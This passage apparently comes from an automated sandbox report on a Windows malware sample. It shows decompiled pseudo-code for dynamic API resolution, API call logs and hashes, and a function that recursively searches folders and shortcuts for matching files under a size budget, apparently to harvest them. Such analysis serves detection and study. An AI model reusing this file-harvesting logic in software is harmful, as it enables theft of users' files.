					 *0x46475c = _t44;
					_t45 = GetProcAddress(_t358, _t263);
					_t264 =  *0x4647ac; // 0x769b0000
					 *0x464890 = _t45;
					_t46 =  *0x45358c; // 0x25c8f70
					_t47 = GetProcAddress(_t264, _t46);
					_t359 =  *0x453a4c; // 0x25c8840
					 *0x464824 = _t47;
					_t48 =  *0x4647ac; // 0x769b0000
					_t49 = GetProcAddress(_t48, _t359);
					_t265 =  *0x453934; // 0x25c71e8
					_t360 =  *0x4647ac; // 0x769b0000
					 *0x4646e0 = _t49;
					 *0x46471c = GetProcAddress(_t360, _t265);
				}
				_t26 =  *0x4648c8; // 0x6cb50000
				if(_t26 != 0) {
					_t261 =  *0x4537bc; // 0x25c8f88
					 *0x4647d0 = GetProcAddress(_t26, _t261);
				}
				_t27 =  *0x464784; // 0x73530000
				if(_t27 != 0) {
					_t352 =  *0x453720; // 0x25c6ae8
					_t28 = GetProcAddress(_t27, _t352);
					_t256 =  *0x464784; // 0x73530000
					 *0x464724 = _t28;
					_t29 =  *0x4535d4; // 0x25c71a8
					_t30 = GetProcAddress(_t256, _t29);
					_t353 =  *0x45363c; // 0x25c6a70
					 *0x464774 = _t30;
					_t31 =  *0x464784; // 0x73530000
					_t32 = GetProcAddress(_t31, _t353);
					_t257 =  *0x453454; // 0x25c8fa0
					_t354 =  *0x464784; // 0x73530000
					 *0x46482c = _t32;
					_t33 = GetProcAddress(_t354, _t257);
					_t258 =  *0x464784; // 0x73530000
					 *0x46486c = _t33;
					_t34 =  *0x453870; // 0x25c8fb8
					_t35 = GetProcAddress(_t258, _t34);
					_t355 =  *0x453b90; // 0x25c7248
					 *0x46484c = _t35;
					_t36 =  *0x464784; // 0x73530000
					_t37 = GetProcAddress(_t36, _t355);
					_t259 =  *0x4536c4; // 0x25c73a8
					_t356 =  *0x464784; // 0x73530000
					 *0x464800 = _t37;
					_t38 = GetProcAddress(_t356, _t259);
					_t260 =  *0x464784; // 0x73530000
					 *0x464740 = _t38;
					_t39 =  *0x453b84; // 0x25c9000
					_t40 = GetProcAddress(_t260, _t39);
					 *0x4648c0 = _t40;
					return _t40;
				}
				return _t27;
			}

0x00424430
0x00424437
0x0042443d
0x00424445
0x0042444b
0x00424451
0x00424456
0x0042445d
0x00424463
0x00424469
0x00424471
0x00424476
0x0042447c
0x00424482
0x00424487
0x0042448e
0x00424494
0x0042449a
0x0042449f
0x004244a6
0x004244ac
0x004244b2
0x004244ba
0x004244bf
0x004244c5
0x004244cb
0x004244d0
0x004244d7
0x004244dd
0x004244e3
0x004244e8
0x004244ef
0x004244f5
0x004244fb
0x00424503
0x00424508
0x0042450e
0x00424514
0x00424519
0x00424520
0x00424526
0x0042452c
0x00424531
0x00424538
0x0042453e
0x00424544
0x0042454c
0x00424551
0x00424557
0x0042455d
0x00424562
0x00424569
0x0042456f
0x00424575
0x0042457a
0x00424581
0x00424587
0x0042458d
0x00424595
0x0042459a
0x004245a0
0x004245a6
0x004245ab
0x004245b2
0x004245b8
0x004245be
0x004245c3
0x004245ca
0x004245d0
0x004245d6
0x004245de
0x004245e3
0x004245e9
0x004245ef
0x004245f4
0x004245fb
0x00424601
0x00424607
0x0042460c
0x00424613
0x00424619
0x0042461f
0x00424627
0x0042462c
0x00424632
0x00424638
0x0042463d
0x00424644
0x0042464a
0x00424650
0x00424655
0x0042465c
0x00424662
0x00424668
0x00424670
0x00424675
0x0042467b
0x00424681
0x00424686
0x0042468d
0x00424693
0x00424699
0x0042469e
0x004246a5
0x004246ab
0x004246b1
0x004246b9
0x004246c4
0x004246c9
0x004246ce
0x004246d6
0x004246dc
0x004246e2
0x004246e7
0x004246ee
0x004246f4
0x004246fa
0x00424702
0x00424707
0x0042470d
0x00424713
0x00424718
0x0042471f
0x00424725
0x0042472b
0x00424730
0x00424737
0x0042473d
0x00424743
0x0042474b
0x00424750
0x00424756
0x0042475c
0x00424761
0x00424768
0x0042476e
0x00424774
0x00424779
0x00424780
0x00424786
0x0042478c
0x00424794
0x00424799
0x0042479f
0x004247a5
0x004247aa
0x004247b1
0x004247b7
0x004247bd
0x004247c2
0x004247c9
0x004247cf
0x004247d5
0x004247dd
0x004247e2
0x004247e8
0x004247ee
0x004247f3
0x004247fa
0x00424800
0x00424806
0x0042480b
0x00424812
0x00424818
0x0042481e
0x00424826
0x0042482b
0x00424831
0x00424837
0x0042483c
0x00424843
0x00424849
0x0042484f
0x00424854
0x0042485b
0x00424861
0x00424867
0x0042486f
0x00424874
0x0042487a
0x00424880
0x00424885
0x0042488c
0x00424892
0x00424898
0x0042489d
0x004248a4
0x004248aa
0x004248b0
0x004248b8
0x004248bd
0x004248c3
0x004248c9
0x004248ce
0x004248d5
0x004248db
0x004248e1
0x004248e6
0x004248ed
0x004248f3
0x004248f9
0x00424901
0x00424906
0x0042490c
0x00424912
0x00424917
0x0042491e
0x00424924
0x0042492a
0x0042492f
0x00424936
0x0042493c
0x00424942
0x0042494a
0x00424955
0x0042495a
0x0042495f
0x00424967
0x0042496d
0x00424973
0x00424978
0x0042497f
0x00424985
0x0042498b
0x00424993
0x00424998
0x0042499e
0x004249a4
0x004249a9
0x004249b0
0x004249b6
0x004249bc
0x004249c1
0x004249ce
0x004249ce
0x004249d3
0x004249da
0x004249e0
0x004249e7
0x004249f2
0x004249f7
0x004249fd
0x00424a03
0x00424a0a
0x00424a0f
0x00424a15
0x00424a1c
0x00424a27
0x00424a2c
0x00424a32
0x00424a38
0x00424a3f
0x00424a44
0x00424a4a
0x00424a51
0x00424a56
0x00424a5c
0x00424a61
0x00424a67
0x00424a6d
0x00424a74
0x00424a79
0x00424a7f
0x00424a86
0x00424a8b
0x00424a91
0x00424a96
0x00424a9d
0x00424aa3
0x00424aab
0x00424ab1
0x00424ab7
0x00424abc
0x00424ac3
0x00424ac9
0x00424acf
0x00424ad7
0x00424adc
0x00424ae2
0x00424ae8
0x00424aed
0x00424af4
0x00424afa
0x00424b00
0x00424b05
0x00424b0c
0x00424b12
0x00424b18
0x00424b20
0x00424b2b
0x00424b2b
0x00424b30
0x00424b37
0x00424b39
0x00424b41
0x00424b47
0x00424b4d
0x00424b52
0x00424b59
0x00424b5f
0x00424b65
0x00424b6d
0x00424b78
0x00424b78
0x00424b7d
0x00424b84
0x00424b8a
0x00424b92
0x00424b98
0x00424b9e
0x00424ba3
0x00424baa
0x00424bb0
0x00424bb6
0x00424bbe
0x00424bc3
0x00424bc9
0x00424bcf
0x00424bd4
0x00424bdb
0x00424be1
0x00424be7
0x00424bec
0x00424bf3
0x00424bf9
0x00424bff
0x00424c07
0x00424c0c
0x00424c12
0x00424c18
0x00424c1d
0x00424c24
0x00424c2a
0x00424c30
0x00424c35
0x00424c3c
0x00424c42
0x00424c48
0x00424c50
0x00424c55
0x00424c5b
0x00424c61
0x00424c66
0x00424c6d
0x00424c73
0x00424c79
0x00424c7e
0x00424c85
0x00424c8b
0x00424c91
0x00424c99
0x00424c9e
0x00424ca4
0x00424caa
0x00424caf
0x00424cb6
0x00424cbc
0x00424cc2
0x00424cc7
0x00424cce
0x00424cd4
0x00424cda
0x00424ce2
0x00424ced
0x00424ced
0x00424cf2
0x00424cf9
0x00424cff
0x00424d07
0x00424d0d
0x00424d13
0x00424d18
0x00424d1f
0x00424d25
0x00424d2b
0x00424d33
0x00424d38
0x00424d3e
0x00424d44
0x00424d49
0x00424d50
0x00424d56
0x00424d5c
0x00424d61
0x00424d68
0x00424d6e
0x00424d74
0x00424d7c
0x00424d81
0x00424d87
0x00424d8d
0x00424d92
0x00424d99
0x00424d9f
0x00424da5
0x00424daa
0x00424db1
0x00424db7
0x00424dbd
0x00424dc5
0x00424dca
0x00424dd0
0x00424dd6
0x00424ddb
0x00424de2
0x00424de8
0x00424dee
0x00424df3
0x00424dfa
0x00424e00
0x00424e06
0x00424e0e
0x00424e13
0x00424e19
0x00424e1f
0x00424e24
0x00424e31
0x00424e31
0x00424e36
0x00424e3d
0x00424e43
0x00424e4b
0x00424e51
0x00424e57
0x00424e5c
0x00424e63
0x00424e69
0x00424e6f
0x00424e74
0x00424e7b
0x00424e81
0x00424e87
0x00424e8f
0x00424e94
0x00424e9a
0x00424ea0
0x00424ea5
0x00424eac
0x00424eb2
0x00424eb8
0x00424ebd
0x00424ec4
0x00424eca
0x00424ed0
0x00424ed8
0x00424ee3
0x00424ee3
0x00424ee8
0x00424eef
0x00424ef1
0x00424ef9
0x00424eff
0x00424f05
0x00424f0a
0x00424f11
0x00424f17
0x00424f1d
0x00424f25
0x00424f2a
0x00424f30
0x00424f36
0x00424f3b
0x00424f42
0x00424f48
0x00424f4e
0x00424f53
0x00424f60
0x00424f60
0x00424f65
0x00424f6c
0x00424f72
0x00424f7a
0x00424f80
0x00424f86
0x00424f8b
0x00424f92
0x00424f98
0x00424f9e
0x00424fa6
0x00424fab
0x00424fb1
0x00424fb7
0x00424fbc
0x00424fc3
0x00424fc9
0x00424fcf
0x00424fd4
0x00424fdb
0x00424fe1
0x00424fe7
0x00424fef
0x00424ff4
0x00424ffa
0x00425000
0x00425005
0x0042500c
0x00425012
0x00425018
0x0042501d
0x00425024
0x0042502a
0x00425030
0x00425038
0x0042503d
0x00425043
0x00425049
0x0042504e
0x00425055
0x0042505b
0x00425061
0x00425066
0x00425073
0x00425073
0x00425078
0x0042507f
0x00425081
0x00425089
0x0042508f
0x00425095
0x0042509a
0x004250a1
0x004250a7
0x004250ad
0x004250b5
0x004250c0
0x004250c0
0x004250c5
0x004250cc
0x004250ce
0x004250d6
0x004250dc
0x004250e2
0x004250e7
0x004250ee
0x004250f4
0x004250fa
0x00425102
0x0042510d
0x0042510d
0x00425112
0x00425119
0x0042511f
0x00425127
0x0042512d
0x00425133
0x00425138
0x0042513f
0x00425145
0x0042514b
0x00425153
0x00425158
0x0042515e
0x00425164
0x00425169
0x00425170
0x00425176
0x0042517c
0x00425181
0x00425188
0x0042518e
0x00425194
0x0042519c
0x004251a7
0x004251a7
0x004251ac
0x004251b3
0x004251b5
0x004251c3
0x004251c3
0x004251c8
0x004251cf
0x004251d5
0x004251dd
0x004251e3
0x004251e9
0x004251ee
0x004251f5
0x004251fb
0x00425201
0x00425206
0x0042520d
0x00425213
0x00425219
0x00425221
0x00425226
0x0042522c
0x00425232
0x00425237
0x0042523e
0x00425244
0x0042524a
0x0042524f
0x00425256
0x0042525c
0x00425262
0x0042526a
0x0042526f
0x00425275
0x0042527b
0x00425280
0x00425287
0x0042528d
0x00000000
0x0042528d
0x00425292

APIs

GetProcAddress.KERNEL32(74CA0000,025C8AC8), ref: 00424445
GetProcAddress.KERNEL32(74CA0000,025C7608), ref: 0042445D
GetProcAddress.KERNEL32(74CA0000,025C8CC0), ref: 00424476
GetProcAddress.KERNEL32(74CA0000,025C6930), ref: 0042448E
GetProcAddress.KERNEL32(74CA0000,025C8D50), ref: 004244A6
GetProcAddress.KERNEL32(74CA0000,025C7628), ref: 004244BF
GetProcAddress.KERNEL32(74CA0000,025C8BA0), ref: 004244D7
GetProcAddress.KERNEL32(74CA0000,025C8C30), ref: 004244EF
GetProcAddress.KERNEL32(74CA0000,025C8B88), ref: 00424508
GetProcAddress.KERNEL32(74CA0000,025C8A98), ref: 00424520
GetProcAddress.KERNEL32(74CA0000,025C8B10), ref: 00424538
GetProcAddress.KERNEL32(74CA0000,025C8AE0), ref: 00424551
GetProcAddress.KERNEL32(74CA0000,025C8C48), ref: 00424569
GetProcAddress.KERNEL32(74CA0000,025C7648), ref: 00424581
GetProcAddress.KERNEL32(74CA0000,025C8B28), ref: 0042459A
GetProcAddress.KERNEL32(74CA0000,025C8B58), ref: 004245B2
GetProcAddress.KERNEL32(74CA0000,025C8BB8), ref: 004245CA
GetProcAddress.KERNEL32(74CA0000,025C76A8), ref: 004245E3
GetProcAddress.KERNEL32(74CA0000,025C8C60), ref: 004245FB
GetProcAddress.KERNEL32(74CA0000,025C8C78), ref: 00424613
GetProcAddress.KERNEL32(74CA0000,025C8CF0), ref: 0042462C
GetProcAddress.KERNEL32(74CA0000,025C8C90), ref: 00424644
GetProcAddress.KERNEL32(74CA0000,025C8CA8), ref: 0042465C
GetProcAddress.KERNEL32(74CA0000,025C8DF8), ref: 00424675
GetProcAddress.KERNEL32(74CA0000,025C8E28), ref: 0042468D
GetProcAddress.KERNEL32(74CA0000,025C8E10), ref: 004246A5
GetProcAddress.KERNEL32(74CA0000,025C8E40), ref: 004246BE
GetProcAddress.KERNEL32(74CA0000,025C76C8), ref: 004246D6
GetProcAddress.KERNEL32(74CA0000,025C8D98), ref: 004246EE
GetProcAddress.KERNEL32(74CA0000,025C8DB0), ref: 00424707
GetProcAddress.KERNEL32(74CA0000,025C7728), ref: 0042471F
GetProcAddress.KERNEL32(74CA0000,025C69D0), ref: 00424737
GetProcAddress.KERNEL32(74CA0000,025C8E58), ref: 00424750
GetProcAddress.KERNEL32(74CA0000,025C8DE0), ref: 00424768
GetProcAddress.KERNEL32(74CA0000,025C7748), ref: 00424780
GetProcAddress.KERNEL32(74CA0000,025C8DC8), ref: 00424799
GetProcAddress.KERNEL32(74CA0000,025C9120), ref: 004247B1
GetProcAddress.KERNEL32(74CA0000,025C7768), ref: 004247C9
GetProcAddress.KERNEL32(74CA0000,025C90F0), ref: 004247E2
GetProcAddress.KERNEL32(74CA0000,025C9048), ref: 004247FA
GetProcAddress.KERNEL32(74CA0000,025C90D8), ref: 00424812
GetProcAddress.KERNEL32(74CA0000,025C7788), ref: 0042482B
GetProcAddress.KERNEL32(74CA0000,025C74E8), ref: 00424843
GetProcAddress.KERNEL32(74CA0000,025C7508), ref: 0042485B
GetProcAddress.KERNEL32(74CA0000,025C9030), ref: 00424874
GetProcAddress.KERNEL32(74CA0000,025C91B0), ref: 0042488C
GetProcAddress.KERNEL32(74CA0000,025C7448), ref: 004248A4
GetProcAddress.KERNEL32(74CA0000,025C7488), ref: 004248BD
GetProcAddress.KERNEL32(74CA0000,025C6A20), ref: 004248D5
GetProcAddress.KERNEL32(74CA0000,025C7128), ref: 004248ED
GetProcAddress.KERNEL32(74CA0000,025C7368), ref: 00424906
GetProcAddress.KERNEL32(74CA0000,025C8F10), ref: 0042491E
GetProcAddress.KERNEL32(74CA0000,025C9060), ref: 00424936
GetProcAddress.KERNEL32(74CA0000,025C9198), ref: 0042494F
GetProcAddress.KERNEL32(74CA0000,025C6A98), ref: 00424967
GetProcAddress.KERNEL32(74CA0000,025C9108), ref: 0042497F
GetProcAddress.KERNEL32(74CA0000,025C8FD0), ref: 00424998
GetProcAddress.KERNEL32(74CA0000,025C73C8), ref: 004249B0
GetProcAddress.KERNEL32(74CA0000,025C74A8), ref: 004249C8
LoadLibraryA.KERNEL32(025C60C8,0040F7EA,C21D6F0A), ref: 004249DA
LoadLibraryA.KERNEL32(025C6110), ref: 004249EC
LoadLibraryA.KERNEL32(025C6D98), ref: 004249FD
LoadLibraryA.KERNEL32(025C6080), ref: 00424A0F
LoadLibraryA.KERNEL32(025C6098), ref: 00424A21
LoadLibraryA.KERNEL32(025C60B0), ref: 00424A32
LoadLibraryA.KERNEL32(025C6230), ref: 00424A44
LoadLibraryA.KERNEL32(025C9090), ref: 00424A56
LoadLibraryA.KERNEL32(025C9180), ref: 00424A67
LoadLibraryA.KERNEL32(025C8F28), ref: 00424A79
LoadLibraryA.KERNEL32(025C8FE8), ref: 00424A8B
GetProcAddress.KERNEL32(738E0000,025C69F8), ref: 00424AAB
GetProcAddress.KERNEL32(738E0000,025C5C40), ref: 00424AC3
GetProcAddress.KERNEL32(738E0000,025C6980), ref: 00424ADC
GetProcAddress.KERNEL32(738E0000,025C5FA0), ref: 00424AF4
GetProcAddress.KERNEL32(738E0000,025C6C00), ref: 00424B0C
GetProcAddress.KERNEL32(738E0000,025C60F8), ref: 00424B25
GetProcAddress.KERNEL32(76DC0000,025C5C80), ref: 00424B41
GetProcAddress.KERNEL32(76DC0000,025C7348), ref: 00424B59
GetProcAddress.KERNEL32(76DC0000,025C5D00), ref: 00424B72
GetProcAddress.KERNEL32(76A00000,025C6ED0), ref: 00424B92
GetProcAddress.KERNEL32(76A00000,025C5D40), ref: 00424BAA
GetProcAddress.KERNEL32(76A00000,025C6E28), ref: 00424BC3
GetProcAddress.KERNEL32(76A00000,025C6D38), ref: 00424BDB
GetProcAddress.KERNEL32(76A00000,025C6FD8), ref: 00424BF3
GetProcAddress.KERNEL32(76A00000,025C6F18), ref: 00424C0C
GetProcAddress.KERNEL32(76A00000,025C6F00), ref: 00424C24
GetProcAddress.KERNEL32(76A00000,025C11D8), ref: 00424C3C
GetProcAddress.KERNEL32(76A00000,025C5DE0), ref: 00424C55
GetProcAddress.KERNEL32(76A00000,025C8F40), ref: 00424C6D
GetProcAddress.KERNEL32(76A00000,025C7468), ref: 00424C85
GetProcAddress.KERNEL32(76A00000,025C71C8), ref: 00424C9E
GetProcAddress.KERNEL32(76A00000,025C9078), ref: 00424CB6
GetProcAddress.KERNEL32(76A00000,025C9018), ref: 00424CCE
GetProcAddress.KERNEL32(76A00000,025C8EF8), ref: 00424CE7
GetProcAddress.KERNEL32(6F1D0000,025C5EA0), ref: 00424D07
GetProcAddress.KERNEL32(6F1D0000,025C5D80), ref: 00424D1F
GetProcAddress.KERNEL32(6F1D0000,025C5FC0), ref: 00424D38
GetProcAddress.KERNEL32(6F1D0000,025C5DA0), ref: 00424D50
GetProcAddress.KERNEL32(6F1D0000,025C5DC0), ref: 00424D68
GetProcAddress.KERNEL32(6F1D0000,025C6F48), ref: 00424D81
GetProcAddress.KERNEL32(6F1D0000,025C7808), ref: 00424D99
GetProcAddress.KERNEL32(6F1D0000,025C6D50), ref: 00424DB1
GetProcAddress.KERNEL32(6F1D0000,025C77E8), ref: 00424DCA
GetProcAddress.KERNEL32(6F1D0000,025C7588), ref: 00424DE2
GetProcAddress.KERNEL32(6F1D0000,025C78A8), ref: 00424DFA
GetProcAddress.KERNEL32(6F1D0000,025C7828), ref: 00424E13
GetProcAddress.KERNEL32(6F1D0000,025C72A8), ref: 00424E2B
GetProcAddress.KERNEL32(751F0000,025C7868), ref: 00424E4B
GetProcAddress.KERNEL32(751F0000,025C6DE0), ref: 00424E63
GetProcAddress.KERNEL32(751F0000,025C6460), ref: 00424E7B
GetProcAddress.KERNEL32(751F0000,025C6E40), ref: 00424E94
GetProcAddress.KERNEL32(751F0000,025C6FF0), ref: 00424EAC
GetProcAddress.KERNEL32(751F0000,025C6F30), ref: 00424EC4
GetProcAddress.KERNEL32(751F0000,025C76E8), ref: 00424EDD
GetProcAddress.KERNEL32(75240000,025C7888), ref: 00424EF9
GetProcAddress.KERNEL32(75240000,025C6E58), ref: 00424F11
GetProcAddress.KERNEL32(75240000,025C90A8), ref: 00424F2A
GetProcAddress.KERNEL32(75240000,025C74C8), ref: 00424F42
GetProcAddress.KERNEL32(75240000,025C7148), ref: 00424F5A
GetProcAddress.KERNEL32(748F0000,025C77A8), ref: 00424F7A
GetProcAddress.KERNEL32(748F0000,025C6E10), ref: 00424F92
GetProcAddress.KERNEL32(748F0000,025C77C8), ref: 00424FAB
GetProcAddress.KERNEL32(748F0000,025C6FA8), ref: 00424FC3
GetProcAddress.KERNEL32(748F0000,025C6580), ref: 00424FDB
GetProcAddress.KERNEL32(748F0000,025C6D68), ref: 00424FF4
GetProcAddress.KERNEL32(748F0000,025C7668), ref: 0042500C
GetProcAddress.KERNEL32(748F0000,025C7708), ref: 00425024
GetProcAddress.KERNEL32(748F0000,025C8F58), ref: 0042503D
GetProcAddress.KERNEL32(748F0000,025C9138), ref: 00425055
GetProcAddress.KERNEL32(748F0000,025C91C8), ref: 0042506D
GetProcAddress.KERNEL32(77080000,025C7848), ref: 00425089
GetProcAddress.KERNEL32(77080000,025C75C8), ref: 004250A1
GetProcAddress.KERNEL32(77080000,025C78C8), ref: 004250BA
GetProcAddress.KERNEL32(75340000,025C8EE0), ref: 004250D6
GetProcAddress.KERNEL32(75340000,025C7188), ref: 004250EE
GetProcAddress.KERNEL32(75340000,025C72E8), ref: 00425107
GetProcAddress.KERNEL32(769B0000,025C90C0), ref: 00425127
GetProcAddress.KERNEL32(769B0000,025C9150), ref: 0042513F
GetProcAddress.KERNEL32(769B0000,025C9168), ref: 00425158
GetProcAddress.KERNEL32(769B0000,025C8F70), ref: 00425170
GetProcAddress.KERNEL32(769B0000,025C8840), ref: 00425188
GetProcAddress.KERNEL32(769B0000,025C71E8), ref: 004251A1
GetProcAddress.KERNEL32(6CB50000,025C8F88), ref: 004251BD
GetProcAddress.KERNEL32(73530000,025C6AE8), ref: 004251DD
GetProcAddress.KERNEL32(73530000,025C71A8), ref: 004251F5
GetProcAddress.KERNEL32(73530000,025C6A70), ref: 0042520D
GetProcAddress.KERNEL32(73530000,025C8FA0), ref: 00425226
GetProcAddress.KERNEL32(73530000,025C8FB8), ref: 0042523E
GetProcAddress.KERNEL32(73530000,025C7248), ref: 00425256
GetProcAddress.KERNEL32(73530000,025C73A8), ref: 0042526F
GetProcAddress.KERNEL32(73530000,025C9000), ref: 00425287

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: 5ae175a0820b1bc576afdce81b1a932fcd256f4f630600f1429e3ea4afc4a53b
Instruction ID: 7a7f5d2e2a1fb31dd14df3602e36195cfc354d454d41878d24c23bdebd1096b3
Opcode Fuzzy Hash: 5ae175a0820b1bc576afdce81b1a932fcd256f4f630600f1429e3ea4afc4a53b
Instruction Fuzzy Hash: 3C9230B9610240AFDB44EFA4ED9892677F9F7CA7433108539E905C3361F7B4A940DB2A

Uniqueness

Uniqueness Score: -1.00%

Function 0040BC20 Relevance: 86.2, APIs: 46, Strings: 3, Instructions: 475
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 33%

			E0040BC20(intOrPtr _a4, intOrPtr _a8, char* _a12, char* _a16, intOrPtr _a20, void* _a24, char* _a28, int _a32, int _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48) {
				signed int _v8;
				char _v268;
				char _v528;
				char _v1528;
				char _v1788;
				char _v2788;
				char _v7788;
				struct _WIN32_FIND_DATAA _v8108;
				void* _v8109;
				intOrPtr _v8116;
				intOrPtr _v8120;
				char* _v8124;
				char _v8128;
				char* _v8132;
				void* _v8136;
				char* _v8140;
				char _v8144;
				intOrPtr _v8148;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t126;
				char* _t129;
				void* _t132;
				int _t139;
				void* _t141;
				int _t155;
				int _t168;
				char* _t169;
				int _t171;
				int _t177;
				int _t185;
				char* _t186;
				int _t187;
				int _t195;
				char* _t196;
				void* _t208;
				intOrPtr _t209;
				char* _t211;
				void* _t222;
				void* _t223;
				intOrPtr _t241;
				intOrPtr _t253;
				char* _t258;
				char* _t273;
				char* _t280;
				char* _t283;
				intOrPtr _t288;
				char* _t289;
				signed int _t290;
				void* _t291;
				void* _t293;
				void* _t294;
				char* _t295;
				void* _t315;

				E0042BC40(0x1fd0);
				_t126 =  *0x451f00; // 0xc21d6f0a
				_v8 = _t126 ^ _t290;
				_t289 = _a28;
				_t288 = _a8;
				_v8116 = _a4;
				_t129 = _a12;
				_v8120 = _t288;
				_v8124 = _t129;
				_v8132 = _a16;
				_v8140 = _t289;
				wsprintfA( &_v1788, "%s\\*", _t129);
				_t132 = FindFirstFileA( &_v1788,  &_v8108); // executed
				_t264 =  &_v7788;
				_t223 = _t132;
				_v8136 = _t223;
				E0042A2F0( &_v7788, 0, 0x1388);
				_t293 = _t291 + 0x18;
				_t135 =  *0x464860( &_v7788, _t289);
				_v8128 = 0;
				if(_t223 == 0xffffffff) {
					L39:
					return E0042A36A(_t135, _t223, _v8 ^ _t290, _t264, _t288, _t289);
				}
				_t223 = _a24;
				do {
					_push(".");
					_push( &(_v8108.cFileName));
					if( *0x464890() == 0) {
						goto L37;
					}
					_push("..");
					_push( &(_v8108.cFileName));
					if( *0x464890() == 0) {
						goto L37;
					}
					_t289 = _v8124;
					_t141 = E00409D50(_t289, 0x80000000); // executed
					_t293 = _t293 + 8;
					if(_t141 == 0) {
						goto L37;
					}
					 *0x46490c( &_v528, _t289);
					 *0x464860( &_v528, "\\");
					 *0x464860( &_v528,  &(_v8108.cFileName));
					_t301 = _a36;
					if(_a36 != 0) {
						L7:
						E0042A2F0( &_v1528, 0, 0x3e8);
						E0042A2F0( &_v2788, 0, 0x3e8);
						_t294 = _t293 + 0x18;
						_push(0x443c1c);
						_push(_t288);
						if( *0x464890() != 0) {
							wsprintfA( &_v2788, "%s\\%s", _t288,  &(_v8108.cFileName));
							_t293 = _t294 + 0x10;
						} else {
							wsprintfA( &_v2788, "%s",  &(_v8108.cFileName));
							_t293 = _t294 + 0xc;
						}
						_push( &_v7788);
						if( *0x464758() <= 3) {
							__eflags = _a36;
							if(_a36 == 0) {
								L57:
								_t155 = PathMatchSpecA( &(_v8108.cFileName), _v8132);
								__eflags = _t155;
								if(_t155 == 0) {
									goto L33;
								}
								 *0x46490c( &_v268, _t288);
								 *0x464860( &_v268, "\\");
								 *0x464860( &_v268,  &(_v8108.cFileName));
								_t264 =  &_v528;
								_t289 = E0042CF60(E004205F0( &_v528),  &_v528, 0x3e8, 0);
								__eflags = _t223 - _t289;
								if(_t223 <= _t289) {
									goto L33;
								}
								_t135 =  *0x453c9c; // 0xabe0
								__eflags = _t135 -  *0x453ca8; // 0x0
								if(__eflags <= 0) {
									goto L39;
								}
								_t168 = E00409D50(_v8124, 0xc0000000);
								_t293 = _t293 + 8;
								__eflags = _t168;
								if(_t168 == 0) {
									goto L33;
								}
								_t273 =  &_v528;
								_t169 = _t273;
								L54:
								__eflags = _a32;
								_t241 = _v8116;
								_push(_t273);
								if(_a32 == 0) {
									_t169 =  &_v268;
								}
								_push(_t169);
								_push(_t241);
								E004295D0();
								_t293 = _t293 + 0xc;
								 *0x453ca8 =  *0x453ca8 + _t289;
								goto L33;
							}
							_t171 = PathMatchSpecA( &(_v8108.cFileName), "*.lnk");
							__eflags = _t171;
							if(_t171 == 0) {
								goto L57;
							}
							 *0x464884(0);
							E00409C10( &_v528,  &_v1528);
							_t293 = _t293 + 8;
							 *0x464868();
							_t177 = PathMatchSpecA( &_v1528, _v8132);
							__eflags = _t177;
							if(_t177 == 0) {
								goto L33;
							}
							 *0x46490c( &_v268, _t288);
							 *0x464860( &_v268, "\\");
							 *0x464860( &_v268, PathFindFileNameA( &_v1528));
							_t264 =  &_v1528;
							_t289 = E0042CF60(E004205F0( &_v1528),  &_v1528, 0x3e8, 0);
							__eflags = _t223 - _t289;
							if(_t223 <= _t289) {
								goto L33;
							}
							_t135 =  *0x453c9c; // 0xabe0
							__eflags = _t135 -  *0x453ca8; // 0x0
							if(__eflags <= 0) {
								goto L39;
							}
							_t185 = E00409D50(_v8124, 0xc0000000);
							_t293 = _t293 + 8;
							__eflags = _t185;
							if(_t185 == 0) {
								goto L33;
							}
							_t273 =  &_v1528;
							_t169 = _t273;
							goto L54;
						} else {
							_t186 = E0042CE7D(_t223,  &_v7788, _t288,  &_v7788, ":",  &_v8144);
							_t288 = 0;
							_t293 = _t293 + 0xc;
							_t289 = _t186;
							_v8128 = 0;
							if(_a36 != 0 && PathMatchSpecA( &(_v8108.cFileName), "*.lnk") != 0) {
								_t288 = 1;
								 *0x464884(0);
								E00409C10( &_v528,  &_v1528);
								_t293 = _t293 + 8;
								 *0x464868();
							}
							if(_t289 == 0) {
								L23:
								if(_t288 == 0) {
									_t187 = PathMatchSpecA( &(_v8108.cFileName), _v8132);
									__eflags = _t187;
									if(_t187 == 0) {
										goto L32;
									}
									 *0x46490c( &_v268, _v8120);
									 *0x464860( &_v268, "\\");
									 *0x464860( &_v268,  &(_v8108.cFileName));
									_t264 =  &_v528;
									_t289 = E0042CF60(E004205F0( &_v528),  &_v528, 0x3e8, 0);
									__eflags = _t223 - _t289;
									if(_t223 <= _t289) {
										goto L32;
									}
									_t135 =  *0x453c9c; // 0xabe0
									__eflags = _t135 -  *0x453ca8; // 0x0
									if(__eflags <= 0) {
										goto L39;
									}
									_t195 = E00409D50(_v8124, 0xc0000000);
									_t293 = _t293 + 8;
									__eflags = _t195;
									if(_t195 == 0) {
										goto L32;
									}
									__eflags = _a32;
									_t253 = _v8116;
									_t280 =  &_v528;
									_push(_t280);
									_t196 = _t280;
									if(_a32 == 0) {
										_t196 =  &_v268;
									}
									_push(_t196);
									_push(_t253);
									L31:
									E004295D0();
									_t293 = _t293 + 0xc;
									 *0x453ca8 =  *0x453ca8 + _t289;
									goto L32;
								}
								if(PathMatchSpecA( &_v1528, _v8132) == 0) {
									goto L32;
								}
								 *0x46490c( &_v268, _v8120);
								 *0x464860( &_v268, "\\");
								 *0x464860( &_v268, PathFindFileNameA( &_v1528));
								_t289 = E0042CF60(E004205F0( &_v1528),  &_v1528, 0x3e8, 0);
								if(_t223 <= _t289) {
									goto L32;
								}
								_t264 =  *0x453c9c; // 0xabe0
								_t315 = _t264 -  *0x453ca8; // 0x0
								if(_t315 <= 0) {
									goto L39;
								}
								_t208 = E00409D50(_v8124, 0xc0000000);
								_t293 = _t293 + 8;
								if(_t208 == 0) {
									goto L32;
								}
								_t209 = _v8116;
								_t258 =  &_v1528;
								_push(_t258);
								_t283 = _t258;
								if(_a32 == 0) {
									_t283 =  &_v268;
								}
								_push(_t283);
								_push(_t209);
								goto L31;
							} else {
								do {
									_push(0);
									_push(_t289);
									if(_t288 == 0) {
